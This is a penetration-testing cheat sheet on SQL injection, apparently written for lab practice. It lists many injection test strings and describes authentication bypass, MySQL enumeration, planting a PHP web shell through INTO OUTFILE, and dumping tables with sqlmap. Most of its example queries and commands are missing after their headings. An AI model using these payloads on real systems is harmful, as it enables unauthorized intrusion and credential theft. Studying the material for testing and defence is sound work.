SQL injection
Basic technique
Stick ' in a parameter and see if it throws a database error (and note what kind).
Another simple test:
' or '1'='1Other tests:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("xPOST parameters
You can also attempt to inject parameters passed using POST requests, but you'll need Burp or Firefox tamper to view and edit them. For example, you can test a parameter by adding a ' at the end, like lang=en'.
Bypassing authentication
If you find a poorly-sanitized login page, you can attempt to log in without credentials by injecting the username parameter:
Database enumeration
The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL.
Get version:
You can get the number of columns through trial and error using order by. For each query, increase the column number until the database throws an unknown column error:
Get the current user:
See all tables:
Get column names for a specified table:
Get usernames and passwords (0x3a means :):
You might be able to write to system files depending on permission levels using MySQL's INTO OUTFILE function to create a php shell in the web root:
I suspect you could inject a full reverse shell in there too...
SQLmap
Assuming you've tested a parameter with ' and it is injectable, run SQL map against the URL:
It may not run unless you specify the database type.
Get the databases:
Get the tables in a database:
Get the columns in a table:
Dump a table:
Passing tokens
If the URL isn't accessible, you can pass cookie data or authentication credentials to SQLmap by pasting the post request in a file and using the -r option:
If you just need to pass a cookie:
REST-style URLs
If your URLs have no parameters, you can still test them:
Further reading
Last updated